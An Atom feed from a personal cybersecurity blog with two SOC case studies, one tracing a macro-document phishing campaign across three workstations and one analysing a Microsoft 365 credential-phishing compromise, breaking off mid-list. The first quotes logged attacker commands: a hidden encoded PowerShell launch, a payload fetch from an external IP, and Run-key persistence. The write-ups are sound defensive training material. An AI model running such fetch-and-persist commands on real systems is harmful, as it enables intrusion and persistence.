<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="/feed.xml" rel="self" type="application/atom+xml" /><link href="/" rel="alternate" type="text/html" /><updated>2026-09-07T13:49:04+00:00</updated><id>/feed.xml</id><title type="html">Documenting my Cybersecurity Projects</title><subtitle>This website documents my progress in Cybersecurity, welcome to follow along. Write an awesome description for your new site here. You can edit this line in _config.yml. It will appear in your document head meta (for Google search results) and in your feed.xml site description.
</subtitle><author><name>Precious Cyber6ixxx</name></author><entry><title type="html">SOC Investigation Case Study — Incident Scoping and Patient Zero</title><link href="/soc/incident%20response/phishing/threat%20detection/2026/08/21/SOC-Case-005-Incident-Scoping-Patient-Zero.html" rel="alternate" type="text/html" title="SOC Investigation Case Study — Incident Scoping and Patient Zero" /><published>2026-08-21T00:00:00+00:00</published><updated>2026-08-21T00:00:00+00:00</updated><id>/soc/incident%20response/phishing/threat%20detection/2026/08/21/SOC-Case-005-Incident-Scoping-Patient-Zero</id><content type="html" xml:base="/soc/incident%20response/phishing/threat%20detection/2026/08/21/SOC-Case-005-Incident-Scoping-Patient-Zero.html"><![CDATA[<h1 id="-soc-case-005--incident-scoping--patient-zero">🧪 SOC Case #005 — Incident Scoping &amp; Patient Zero</h1>

<h2 id="overview">Overview</h2>

<p>This investigation focused on a different SOC question:</p>

<blockquote>
  <p><strong>How far did the attack spread?</strong></p>
</blockquote>

<p>Rather than analyzing one suspicious event in isolation, the objective was to correlate email, endpoint, network, authentication and file-share telemetry across multiple workstations.</p>

<p>The investigation involved three hosts:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">WS-FIN-007</code> — Alice Okafor, Finance</li>
  <li><code class="language-plaintext highlighter-rouge">WS-HR-012</code> — David Bello, HR</li>
  <li><code class="language-plaintext highlighter-rouge">WS-OPS-031</code> — James Eze, Operations</li>
</ul>

<p>The investigation ultimately identified <strong>two affected hosts belonging to the same phishing campaign</strong>, while Host C remained unconfirmed for compromise.</p>

<hr />

<h1 id="1-initial-alert">1. Initial Alert</h1>

<p>At <strong>14:05 UTC</strong>, the SOC received an alert for suspicious PowerShell activity involving a Finance employee.</p>

<p>Initial investigation focused on <code class="language-plaintext highlighter-rouge">WS-FIN-007</code>.</p>

<p>The available telemetry showed a phishing email, malicious Word document execution, PowerShell activity, payload download, registry persistence, discovery commands and subsequent authentication activity involving another workstation.</p>

<hr />

<h1 id="2-initial-access--phishing-email">2. Initial Access — Phishing Email</h1>

<p>Alice received:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>From: accounts@vendor-invoice-support.com
To: alice.okafor@company.com
Subject: Urgent: Updated Supplier Invoice
Attachment: Supplier_Invoice_8821.docm
</code></pre></div></div>

<p>The sending domain had been registered only <strong>6 days earlier</strong>.</p>

<p>The same attachment and sender were subsequently observed targeting an HR employee.</p>

<p>This immediately suggested that the activity could represent a broader phishing campaign rather than an isolated event.</p>

<hr />

<h1 id="3-host-a--ws-fin-007">3. Host A — WS-FIN-007</h1>

<h2 id="malicious-document-execution">Malicious Document Execution</h2>

<p>At <strong>08:47:31</strong>, Sysmon Event ID 1 recorded:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Image:
powershell.exe

ParentImage:
WINWORD.EXE

CommandLine:
powershell.exe -nop -w hidden -enc &lt;Base64&gt;
</code></pre></div></div>

<p>The parent-child relationship is significant.</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>WINWORD.EXE
     ↓
powershell.exe
     ↓
Encoded command
</code></pre></div></div>

<p>PowerShell executing from Microsoft Word in hidden mode with an encoded command is a strong indicator of malicious document execution.</p>

<hr />

<h1 id="4-payload-download">4. Payload Download</h1>

<p>One second later, PowerShell Script Block Logging recorded:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Invoke-WebRequest https://203.0.113.45/update.ps1
</code></pre></div></div>

<p>Sysmon Event ID 3 then recorded:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Image:
powershell.exe

Destination:
203.0.113.45:443
</code></pre></div></div>

<p>This establishes a clear relationship between the malicious PowerShell process and the external payload infrastructure.</p>

<hr />

<h1 id="5-payload-creation">5. Payload Creation</h1>

<p>At <strong>08:47:36</strong>, Sysmon Event ID 11 recorded:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Users\alice\AppData\Roaming\Microsoft\update.ps1
</code></pre></div></div>

<p>The downloaded PowerShell payload was therefore written to the workstation.</p>

<p>The investigation had now progressed from:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Phishing
    ↓
Execution
    ↓
External payload retrieval
    ↓
Payload creation
</code></pre></div></div>

<hr />

<h1 id="6-persistence">6. Persistence</h1>

<p>At <strong>08:48:02</strong>, Sysmon Event ID 13 recorded a registry modification:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OfficeUpdate

C:\Users\alice\AppData\Roaming\Microsoft\update.exe
</code></pre></div></div>

<p>This establishes a persistence mechanism using the Windows Registry Run Key.</p>

<p>The attacker therefore attempted to maintain execution across user logons.</p>

<hr />

<h1 id="7-discovery-activity">7. Discovery Activity</h1>

<p>Later telemetry showed:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:57:02

update.exe
    ↓
cmd.exe /c whoami
</code></pre></div></div>

<p>followed by:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:57:04

update.exe
    ↓
cmd.exe /c net user
</code></pre></div></div>

<p>These commands represent discovery activity.</p>

<p>The attack had therefore progressed beyond initial execution and persistence into host/account enumeration.</p>

<hr />

<h1 id="8-host-b--ws-hr-012">8. Host B — WS-HR-012</h1>

<p>The same phishing campaign was observed against David Bello.</p>

<h3 id="email">Email</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>From: accounts@vendor-invoice-support.com
To: david.bello@company.com
Subject: Urgent: Updated Supplier Invoice
Attachment: Supplier_Invoice_8821.docm
</code></pre></div></div>

<p>The same sender and attachment were involved.</p>

<p>At <strong>08:50:11</strong>, Sysmon recorded:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>WINWORD.EXE
Parent: explorer.exe

Supplier_Invoice_8821.docm
</code></pre></div></div>

<p>Four seconds later:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>powershell.exe
ParentImage:
WINWORD.EXE
</code></pre></div></div>

<p>The PowerShell command used the same encoded execution pattern.</p>

<hr />

<h1 id="9-same-payload-infrastructure">9. Same Payload Infrastructure</h1>

<p>Host B subsequently communicated with:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>203.0.113.45:443
</code></pre></div></div>

<p>and created:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Users\david\AppData\Roaming\Microsoft\update.ps1
</code></pre></div></div>

<p>This was highly significant.</p>

<p>Both hosts independently showed:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Same phishing attachment
        ↓
PowerShell execution
        ↓
Same external infrastructure
        ↓
Same payload filename/path
</code></pre></div></div>

<p>This provided strong evidence that the two hosts were part of the same campaign.</p>

<hr />

<h1 id="10-dns-correlation">10. DNS Correlation</h1>

<p>DNS telemetry further connected the hosts.</p>

<h3 id="ws-fin-007">WS-FIN-007</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:47:33

vendor-invoice-support.com
</code></pre></div></div>

<h3 id="ws-hr-012">WS-HR-012</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:50:15

vendor-invoice-support.com
</code></pre></div></div>

<p>The same suspicious domain was therefore resolved by both affected workstations.</p>

<hr />

<h1 id="11-authentication-correlation">11. Authentication Correlation</h1>

<p>The investigation then revealed activity that suggested possible lateral movement.</p>

<p>At <strong>08:55:21</strong>:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>User: alice.okafor
Source: WS-FIN-007
Destination: DC01
Logon Type: 3
Status: Success
</code></pre></div></div>

<p>At <strong>08:56:04</strong>:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>User: alice.okafor
Source: WS-FIN-007
Destination: WS-HR-012
Logon Type: 3
Status: Success
</code></pre></div></div>

<p>At <strong>08:56:17</strong>:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>User: david.bello
Source: WS-HR-012
Destination: WS-FIN-007
Logon Type: 3
Status: Success
</code></pre></div></div>

<p>This sequence raised the hypothesis of credential or authenticated-session abuse between the two workstations.</p>

<hr />

<h1 id="12-file-share-activity">12. File Share Activity</h1>

<p>At <strong>08:56:20</strong>, file-share telemetry showed:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Source:
WS-FIN-007

Account:
alice.okafor

Accessed:
\\WS-HR-012\C$\Users\david\AppData\Roaming\Microsoft\
</code></pre></div></div>

<p>This provided additional evidence that the activity was not limited to phishing delivery.</p>

<p>A compromised workstation associated with Alice’s account was accessing a sensitive administrative file-share path on David’s workstation.</p>

<p>This required immediate investigation for possible lateral movement and credential abuse.</p>

<hr />

<h1 id="13-is-host-c-compromised">13. Is Host C Compromised?</h1>

<p>Host C was intentionally included as a potential false positive.</p>

<p><code class="language-plaintext highlighter-rouge">WS-OPS-031</code> showed:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>EXCEL.EXE
    ↓
PowerShell
    ↓
Get-Service
</code></pre></div></div>

<p>and:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PowerShell
    ↓
10.0.0.15:443
</code></pre></div></div>

<p>It also contained:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\TeamsStartup
</code></pre></div></div>

<p>However, Host C did <strong>not</strong> show the strongest campaign indicators:</p>

<ul>
  <li>No phishing attachment</li>
  <li>No connection to <code class="language-plaintext highlighter-rouge">203.0.113.45</code></li>
  <li>No <code class="language-plaintext highlighter-rouge">vendor-invoice-support.com</code></li>
  <li>No <code class="language-plaintext highlighter-rouge">update.ps1</code></li>
  <li>No relationship to the malicious Word document</li>
  <li>No malicious PowerShell parented by Word</li>
</ul>

<p>Therefore:</p>

<blockquote>
  <p><strong>Host C was not classified as compromised based on the available evidence.</strong></p>
</blockquote>

<p>However, it should remain under investigation because the PowerShell activity, network connection and Run Key modification require validation.</p>

<hr />

<h1 id="14-patient-zero-assessment">14. Patient Zero Assessment</h1>

<p>The likely patient-zero host is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>WS-FIN-007
Alice Okafor
</code></pre></div></div>

<p>The reason is not simply that Alice received the phishing email first.</p>

<p>The available telemetry shows the earliest confirmed malicious endpoint execution on WS-FIN-007:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:47:31
WINWORD.EXE
      ↓
PowerShell
</code></pre></div></div>

<p>This was followed by payload retrieval, persistence and discovery activity.</p>

<p>However, the evidence does <strong>not</strong> establish who first received or clicked the phishing email.</p>

<p>Therefore:</p>

<blockquote>
  <p><strong>WS-FIN-007 is the likely patient-zero host based on the earliest observed malicious activity, but patient zero is not conclusively established.</strong></p>
</blockquote>

<hr />

<h1 id="15-incident-scope">15. Incident Scope</h1>

<p>Based on the available telemetry:</p>

<table>
  <thead>
    <tr>
      <th>Host</th>
      <th>Assessment</th>
      <th>Key Evidence</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>WS-FIN-007</td>
      <td>🔴 Compromised</td>
      <td>Malicious PowerShell, payload, persistence, execution, discovery</td>
    </tr>
    <tr>
      <td>WS-HR-012</td>
      <td>🔴 Compromised</td>
      <td>Same phishing attachment, PowerShell, payload download, same infrastructure</td>
    </tr>
    <tr>
      <td>WS-OPS-031</td>
      <td>🟡 Not currently confirmed</td>
      <td>No campaign indicators; activity requires validation</td>
    </tr>
  </tbody>
</table>

<h3 id="current-scope">Current scope</h3>

<p><strong>2 affected workstations</strong></p>

<p><strong>2 associated user accounts requiring containment/investigation</strong></p>

<p>The scope should not be considered final until enterprise-wide IOC searches are completed.</p>

<hr />

<h1 id="16-incident-verdict">16. Incident Verdict</h1>

<h3 id="classification">Classification</h3>

<p><strong>Successful phishing campaign with multi-host compromise and suspected lateral movement.</strong></p>

<h3 id="severity">Severity</h3>

<p><strong>HIGH</strong></p>

<h3 id="primary-attack-vector">Primary attack vector</h3>

<p><strong>Phishing email with a malicious macro-enabled Word document.</strong></p>

<h3 id="confirmed-activity">Confirmed activity</h3>

<ul>
  <li>Malicious document execution</li>
  <li>PowerShell execution</li>
  <li>Payload download</li>
  <li>Payload creation</li>
  <li>Registry persistence on WS-FIN-007</li>
  <li>Discovery activity</li>
  <li>Cross-host authentication</li>
  <li>Administrative file-share access</li>
</ul>

<hr />

<h1 id="17-immediate-containment-priorities">17. Immediate Containment Priorities</h1>

<p>Given limited SOC resources, containment should focus on stopping further execution and lateral movement.</p>

<h3 id="priority-1--isolate-affected-hosts">Priority 1 — Isolate affected hosts</h3>

<p>Immediately isolate:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>WS-FIN-007
WS-HR-012
</code></pre></div></div>

<p>This prevents continued communication and potential lateral movement.</p>

<h3 id="priority-2--contain-associated-accounts">Priority 2 — Contain associated accounts</h3>

<p>Restrict or temporarily disable the accounts where operationally appropriate, beginning with Alice’s account due to the stronger compromise evidence.</p>

<h3 id="priority-3--revoke-sessions-and-reset-credentials">Priority 3 — Revoke sessions and reset credentials</h3>

<p>Revoke active sessions/tokens and force password resets.</p>

<p>Treat credentials associated with the affected hosts as potentially compromised until identity investigation is complete.</p>

<h3 id="priority-4--block-campaign-infrastructure">Priority 4 — Block campaign infrastructure</h3>

<p>Block or quarantine:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vendor-invoice-support.com
203.0.113.45
</code></pre></div></div>

<p>after validating the appropriate network-control scope.</p>

<h3 id="priority-5--search-enterprise-telemetry">Priority 5 — Search enterprise telemetry</h3>

<p>Search across:</p>

<ul>
  <li>Email gateway</li>
  <li>DNS</li>
  <li>Proxy</li>
  <li>EDR</li>
  <li>Windows Event Logs</li>
  <li>Sysmon</li>
  <li>Authentication logs</li>
  <li>File-share telemetry</li>
</ul>

<p>for:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Supplier_Invoice_8821.docm
vendor-invoice-support.com
203.0.113.45
update.ps1
update.exe
OfficeUpdate
</code></pre></div></div>

<p>The objective is to identify additional victims and determine whether WS-FIN-007 and WS-HR-012 represent the full scope.</p>

<hr />

<h1 id="18-mitre-attck-mapping">18. MITRE ATT&amp;CK Mapping</h1>

<table>
  <thead>
    <tr>
      <th>Technique</th>
      <th>Evidence</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><strong>T1566.001 — Phishing: Spearphishing Attachment</strong></td>
      <td>Malicious <code class="language-plaintext highlighter-rouge">.docm</code> attachment delivered through email</td>
    </tr>
    <tr>
      <td><strong>T1059.001 — PowerShell</strong></td>
      <td>PowerShell executed from WINWORD.EXE</td>
    </tr>
    <tr>
      <td><strong>T1105 — Ingress Tool Transfer</strong></td>
      <td><code class="language-plaintext highlighter-rouge">Invoke-WebRequest</code> retrieved <code class="language-plaintext highlighter-rouge">update.ps1</code></td>
    </tr>
    <tr>
      <td><strong>T1547.001 — Registry Run Keys / Startup Folder</strong></td>
      <td><code class="language-plaintext highlighter-rouge">OfficeUpdate</code> Run Key persistence</td>
    </tr>
    <tr>
      <td><strong>T1087 — Account Discovery</strong></td>
      <td><code class="language-plaintext highlighter-rouge">net user</code></td>
    </tr>
    <tr>
      <td><strong>T1033 — System Owner/User Discovery</strong></td>
      <td><code class="language-plaintext highlighter-rouge">whoami</code></td>
    </tr>
    <tr>
      <td><strong>T1021 — Remote Services</strong></td>
      <td>Cross-host authentication activity requiring further validation</td>
    </tr>
  </tbody>
</table>

<hr />

<h1 id="19-key-soc-lessons">19. Key SOC Lessons</h1>

<p>This investigation reinforced several important SOC principles.</p>

<h3 id="1-one-malicious-event-does-not-define-the-incident">1. One malicious event does not define the incident</h3>

<p>The important finding was not simply that PowerShell executed.</p>

<p>The investigation became significant when multiple telemetry sources connected the activity across hosts.</p>

<h3 id="2-campaign-indicators-are-powerful-correlation-points">2. Campaign indicators are powerful correlation points</h3>

<p>The same:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sender
Attachment
Domain
IP
Payload
Execution pattern
</code></pre></div></div>

<p>appeared across multiple hosts.</p>

<p>This allowed the SOC to move from <strong>single-host detection</strong> to <strong>incident scoping</strong>.</p>

<h3 id="3-patient-zero-requires-evidence">3. Patient zero requires evidence</h3>

<p>The earliest email recipient is not automatically patient zero.</p>

<p>The safest conclusion was:</p>

<blockquote>
  <p><strong>WS-FIN-007 is the likely patient-zero host based on earliest observed malicious execution, but this is not conclusively established.</strong></p>
</blockquote>

<h3 id="4-not-every-suspicious-host-is-compromised">4. Not every suspicious host is compromised</h3>

<p>Host C contained activity worth investigating, but there was insufficient evidence to connect it to the phishing campaign.</p>

<p>This prevents unnecessary containment and keeps the investigation evidence-driven.</p>

<h3 id="5-authentication-telemetry-can-reveal-lateral-movement">5. Authentication telemetry can reveal lateral movement</h3>

<p>The cross-host Logon Type 3 events and administrative file-share access significantly changed the scope of the investigation.</p>

<p>The SOC must therefore correlate:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Email
 ↓
Endpoint
 ↓
Network
 ↓
Authentication
 ↓
File Access
</code></pre></div></div>

<p>rather than investigating each telemetry source independently.</p>

<hr />

<h1 id="conclusion">Conclusion</h1>

<p>This case demonstrated the difference between <strong>alert triage</strong> and <strong>incident scoping</strong>.</p>

<p>The initial alert identified suspicious PowerShell activity on a Finance workstation. Correlation with email, DNS, Sysmon, authentication and file-share telemetry revealed that the activity was part of a broader phishing campaign affecting both Finance and HR.</p>

<p><code class="language-plaintext highlighter-rouge">WS-FIN-007</code> showed the most advanced compromise, including persistence and discovery activity, while <code class="language-plaintext highlighter-rouge">WS-HR-012</code> showed the same malicious execution and payload activity.</p>

<p><code class="language-plaintext highlighter-rouge">WS-OPS-031</code> was not classified as compromised because the available evidence did not connect it to the campaign.</p>

<p>The final assessment was therefore:</p>

<blockquote>
  <p><strong>High-severity, multi-host phishing compromise involving WS-FIN-007 and WS-HR-012, with suspected lateral movement and an unresolved patient-zero determination.</strong></p>
</blockquote>

<hr />]]></content><author><name>Precious Cyber6ixxx</name></author><category term="SOC" /><category term="Incident Response" /><category term="Phishing" /><category term="Threat Detection" /><category term="phishing" /><category term="incident-scoping" /><category term="patient-zero" /><category term="lateral-movement" /><category term="PowerShell" /><category term="Sysmon" /><category term="Windows" /><category term="SOC" /><summary type="html"><![CDATA[🧪 SOC Case #005 — Incident Scoping &amp; Patient Zero]]></summary></entry><entry><title type="html">SOC Investigation Case Study — Credential Phishing and Microsoft 365 Account Compromise</title><link href="/soc/phishing/incident%20response/microsoft%20365/2026/08/21/SOC-Phishing-Case-003-Credential-Compromise.html" rel="alternate" type="text/html" title="SOC Investigation Case Study — Credential Phishing and Microsoft 365 Account Compromise" /><published>2026-08-21T00:00:00+00:00</published><updated>2026-08-21T00:00:00+00:00</updated><id>/soc/phishing/incident%20response/microsoft%20365/2026/08/21/SOC-Phishing-Case-003-Credential-Compromise</id><content type="html" xml:base="/soc/phishing/incident%20response/microsoft%20365/2026/08/21/SOC-Phishing-Case-003-Credential-Compromise.html"><![CDATA[<h1 id="-soc-phishing-case-003--credential-phishing--possible-account-compromise">🧪 SOC Phishing Case #003 — Credential Phishing + Possible Account Compromise</h1>

<h2 id="overview">Overview</h2>

<p>This investigation analyzes a phishing attack targeting an HR employee through a fake Microsoft password-expiration notification.</p>

<p>Unlike a simple phishing attempt where a user clicks a malicious link but does not provide credentials, this case progressed further. The user entered valid Microsoft 365 credentials, approved an MFA request, and a successful Microsoft 365 authentication subsequently originated from the same infrastructure associated with the phishing activity.</p>

<p>The investigation therefore focuses on determining exactly how far the attack progressed and separating <strong>confirmed credential compromise</strong> from evidence that would be required to prove broader endpoint or account compromise.</p>

<hr />

<h2 id="alert-summary">Alert Summary</h2>

<table>
  <thead>
    <tr>
      <th>Field</th>
      <th>Value</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>User</td>
      <td>Michael Adeyemi</td>
    </tr>
    <tr>
      <td>Role</td>
      <td>HR Specialist</td>
    </tr>
    <tr>
      <td>Host</td>
      <td>WS-HR-014</td>
    </tr>
    <tr>
      <td>Alert Time</td>
      <td>21 Aug 2026, 10:32 UTC</td>
    </tr>
    <tr>
      <td>Alert</td>
      <td>Suspicious URL</td>
    </tr>
    <tr>
      <td>Sender</td>
      <td><a href="mailto:hr-support@micr0soft-security.com">hr-support@micr0soft-security.com</a></td>
    </tr>
    <tr>
      <td>Subject</td>
      <td>Action Required: Password Expiration Notice</td>
    </tr>
    <tr>
      <td>Phishing Domain</td>
      <td>micr0soft-security.com</td>
    </tr>
  </tbody>
</table>

<hr />

<h1 id="1-initial-phishing-email">1. Initial Phishing Email</h1>

<p>The user received an email claiming that their Microsoft 365 password was about to expire.</p>

<h3 id="email">Email</h3>

<p><strong>From:</strong></p>

<p><code class="language-plaintext highlighter-rouge">hr-support@micr0soft-security.com</code></p>

<p><strong>Subject:</strong></p>

<p><code class="language-plaintext highlighter-rouge">Action Required: Password Expiration Notice</code></p>

<p><strong>Message:</strong></p>

<blockquote>
  <p>Your Microsoft 365 password will expire today.
Please verify your account to prevent interruption of access.</p>
</blockquote>

<p><strong>URL:</strong></p>

<p><code class="language-plaintext highlighter-rouge">https://micr0soft-security.com/verify</code></p>

<p>The message used urgency and an account-verification theme to encourage the recipient to click the link.</p>

<hr />

<h1 id="2-first-point-of-suspicion">2. First Point of Suspicion</h1>

<p>The first significant indicator was the phishing domain:</p>

<p><code class="language-plaintext highlighter-rouge">micr0soft-security.com</code></p>

<p>The domain uses <strong>typosquatting/brand impersonation</strong>, replacing the letter <code class="language-plaintext highlighter-rouge">o</code> in “Microsoft” with the number <code class="language-plaintext highlighter-rouge">0</code>.</p>

<p>The domain also contains <code class="language-plaintext highlighter-rouge">security.com</code>, making it appear related to Microsoft security services.</p>

<p>Another important indicator was the domain age.</p>

<blockquote>
  <p><strong>Domain registration age: 11 days</strong></p>
</blockquote>

<p>A newly registered domain combined with Microsoft impersonation and an urgent password-expiration message significantly increases the likelihood of phishing.</p>

<h3 id="important-observation">Important observation</h3>

<p>The email passed:</p>

<table>
  <thead>
    <tr>
      <th>Control</th>
      <th>Result</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>SPF</td>
      <td>PASS</td>
    </tr>
    <tr>
      <td>DKIM</td>
      <td>PASS</td>
    </tr>
    <tr>
      <td>DMARC</td>
      <td>PASS</td>
    </tr>
  </tbody>
</table>

<p>These results do <strong>not</strong> establish that the sender or domain is legitimate.</p>

<p>Email authentication verifies aspects of domain authorization and message integrity; it does not determine whether the domain itself is trustworthy.</p>

<hr />

<h1 id="3-proxy-investigation">3. Proxy Investigation</h1>

<p>The proxy telemetry shows the user interacting with the suspicious website.</p>

<h3 id="102714">10:27:14</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>michael.adeyemi → 104.21.55.72:443
URL: /verify
User-Agent: Chrome/140.0
</code></pre></div></div>

<p>The user initially accessed the phishing verification page.</p>

<h3 id="102722">10:27:22</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>michael.adeyemi → 104.21.55.72:443
URL: /login
</code></pre></div></div>

<p>The browser was then redirected to a login page.</p>

<h3 id="102803">10:28:03</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>michael.adeyemi → 104.21.55.72:443
URL: /login
HTTP POST observed
</code></pre></div></div>

<p>The HTTP POST is particularly significant because it indicates that information was submitted to the login endpoint.</p>

<hr />

<h1 id="4-user-interview">4. User Interview</h1>

<p>During the investigation, Michael stated:</p>

<blockquote>
  <p>“I clicked the link because I thought my password was expiring. The page looked like Microsoft. I entered my username and password. It then asked me to approve an MFA notification, which I did. After that it redirected me to Microsoft 365.”</p>
</blockquote>

<p>This statement confirms that the user:</p>

<ol>
  <li>Clicked the phishing link.</li>
  <li>Entered their username.</li>
  <li>Entered their password.</li>
  <li>Approved an MFA request.</li>
  <li>Was subsequently redirected to Microsoft 365.</li>
</ol>

<p>This moves the incident significantly beyond a simple phishing attempt.</p>

<hr />

<h1 id="5-identity-investigation">5. Identity Investigation</h1>

<p>At <strong>10:28:17</strong>, Microsoft 365 recorded:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Successful authentication

User: michael.adeyemi
Source IP: 104.21.55.72
User-Agent: Chrome
MFA: Satisfied
</code></pre></div></div>

<p>This event occurred only <strong>14 seconds after the HTTP POST</strong> to the phishing login page.</p>

<p>The sequence is highly significant:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>10:28:03
Credential submission to phishing infrastructure
        ↓
10:28:17
Successful Microsoft 365 authentication
        ↓
MFA satisfied
</code></pre></div></div>

<p>Combined with the user’s admission that credentials were entered and MFA was approved, this provides strong evidence that the credentials were successfully captured and subsequently used.</p>

<hr />

<h1 id="6-subsequent-authentication">6. Subsequent Authentication</h1>

<p>At <strong>10:31:42</strong>, another successful Microsoft 365 authentication was recorded:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>User: michael.adeyemi
Source IP: 197.210.45.18
User-Agent: Chrome
MFA: Satisfied
</code></pre></div></div>

<p>At <strong>10:32:01</strong>, Microsoft 365 recorded:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Microsoft 365 session established

Source IP: 197.210.45.18
</code></pre></div></div>

<p>This activity requires further investigation because it occurred shortly after the suspicious authentication.</p>

<p>The available telemetry does not, by itself, establish exactly who controlled each session. Therefore, this activity should be correlated with Michael’s expected location, device, browser session and normal authentication behavior.</p>

<hr />

<h1 id="7-endpoint-investigation">7. Endpoint Investigation</h1>

<p>Endpoint telemetry from <code class="language-plaintext highlighter-rouge">WS-HR-014</code> showed:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>No suspicious process creation
No PowerShell activity
No suspicious file creation
No malware alerts from EDR
</code></pre></div></div>

<p>This is important because the available evidence does <strong>not</strong> currently support an endpoint malware compromise.</p>

<p>The attack appears to have primarily targeted the user’s credentials and Microsoft 365 account rather than relying on malware execution on the workstation.</p>

<hr />

<h1 id="8-attack-chain">8. Attack Chain</h1>

<p>Based on the available evidence:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Phishing Email
      ↓
Typosquatted Microsoft Domain
      ↓
Phishing Login Page
      ↓
Credential Submission
      ↓
MFA Approval
      ↓
Successful Microsoft 365 Authentication
      ↓
Microsoft 365 Session
</code></pre></div></div>

<h3 id="evidence-supported-progression">Evidence-supported progression</h3>

<p><strong>Email received:</strong> Confirmed</p>

<p><strong>Phishing URL accessed:</strong> Confirmed</p>

<p><strong>Credentials submitted:</strong> Confirmed</p>

<p><strong>MFA approval:</strong> Confirmed</p>

<p><strong>Credentials subsequently used:</strong> Strongly supported / confirmed by authentication telemetry</p>

<p><strong>Microsoft 365 account accessed:</strong> Strongly supported</p>

<p><strong>Endpoint compromise:</strong> Not supported by current evidence</p>

<hr />

<h1 id="9-incident-verdict">9. Incident Verdict</h1>

<h3 id="classification">Classification</h3>

<table>
  <thead>
    <tr>
      <th>Finding</th>
      <th>Assessment</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Phishing attempt</td>
      <td>✅ Confirmed</td>
    </tr>
    <tr>
      <td>Successful phishing</td>
      <td>✅ Confirmed</td>
    </tr>
    <tr>
      <td>Credential compromise</td>
      <td>🔴 Confirmed</td>
    </tr>
    <tr>
      <td>Account compromise</td>
      <td>🔴 Highly likely / supported by evidence</td>
    </tr>
    <tr>
      <td>Endpoint compromise</td>
      <td>❌ Not supported</td>
    </tr>
    <tr>
      <td>Malware execution</td>
      <td>❌ Not observed</td>
    </tr>
  </tbody>
</table>

<p>The incident should therefore be escalated beyond a phishing-only classification.</p>

<p>The strongest evidence is the combination of:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Credential submission
        +
MFA approval
        +
Successful Microsoft 365 authentication
        +
Subsequent Microsoft 365 session
</code></pre></div></div>

<hr />

<h1 id="10-priority-investigation-steps">10. Priority Investigation Steps</h1>

<p>As a SOC analyst, I would prioritize the following actions.</p>

<h3 id="1-investigate-microsoft-365-sign-in-activity">1. Investigate Microsoft 365 sign-in activity</h3>

<p>Review all authentication events surrounding the incident:</p>

<ul>
  <li>Source IP</li>
  <li>Geographic location</li>
  <li>User-Agent</li>
  <li>Authentication method</li>
  <li>MFA details</li>
  <li>Device information</li>
  <li>Session timestamps</li>
</ul>

<p>The goal is to determine whether the subsequent activity was legitimate or attacker-controlled.</p>

<h3 id="2-revoke-active-sessions">2. Revoke active sessions</h3>

<p>Terminate existing Microsoft 365 sessions and revoke active authentication tokens where supported.</p>

<p>This reduces the possibility of an attacker continuing to use an established session.</p>

<h3 id="3-force-credential-reset">3. Force credential reset</h3>

